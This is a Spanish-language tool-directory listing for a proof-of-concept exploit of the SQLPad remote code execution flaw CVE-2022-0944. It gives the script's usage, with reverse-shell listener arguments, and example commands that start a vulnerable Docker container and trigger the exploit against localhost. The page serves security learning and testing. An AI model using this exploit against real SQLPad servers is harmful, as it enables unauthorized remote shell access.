Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-0944 — Un exploit de prueba de concepto para SQLPad RCE (CVE-2022-0944). | Kitploit
Herramientas/GitHubGitHub/shhrew/cve-2022-0944
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubshhrew/cve-2022-0944

CVE-2022-0944

Un exploit de prueba de concepto para SQLPad RCE (CVE-2022-0944).

Ver Repositorio
71hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-0944

Un exploit de prueba de concepto para SQLPad RCE (CVE-2022-0944)

Uso

root@kitploit:~
usage: main.py [-h] url lhost lport [username] [password]

positional arguments:
  url         URL to SQLPad
  lhost       Listener host address for reverse shell
  lport       Listener port for reverse shell
  username    login username (optional)
  password    login password (optional)

options:
  -h, --help  show this help message and exit

Ejemplo:

root@kitploit:~
# install requirements
pip install -r requirements.txt

# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0

# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin

Descargo de responsabilidad

Este repositorio contiene código y herramientas destinados exclusivamente a fines educativos, específicamente para su uso en cursos de ciberseguridad y entornos de aprendizaje. El autor de este código no asume ninguna responsabilidad por las consecuencias derivadas del uso, mal uso o modificación de este código. El código se proporciona "tal cual", sin garantía alguna, ya sea expresa o implícita, incluidas, entre otras, las garantías implícitas de comerciabilidad o idoneidad para un fin determinado.

Descargar herramienta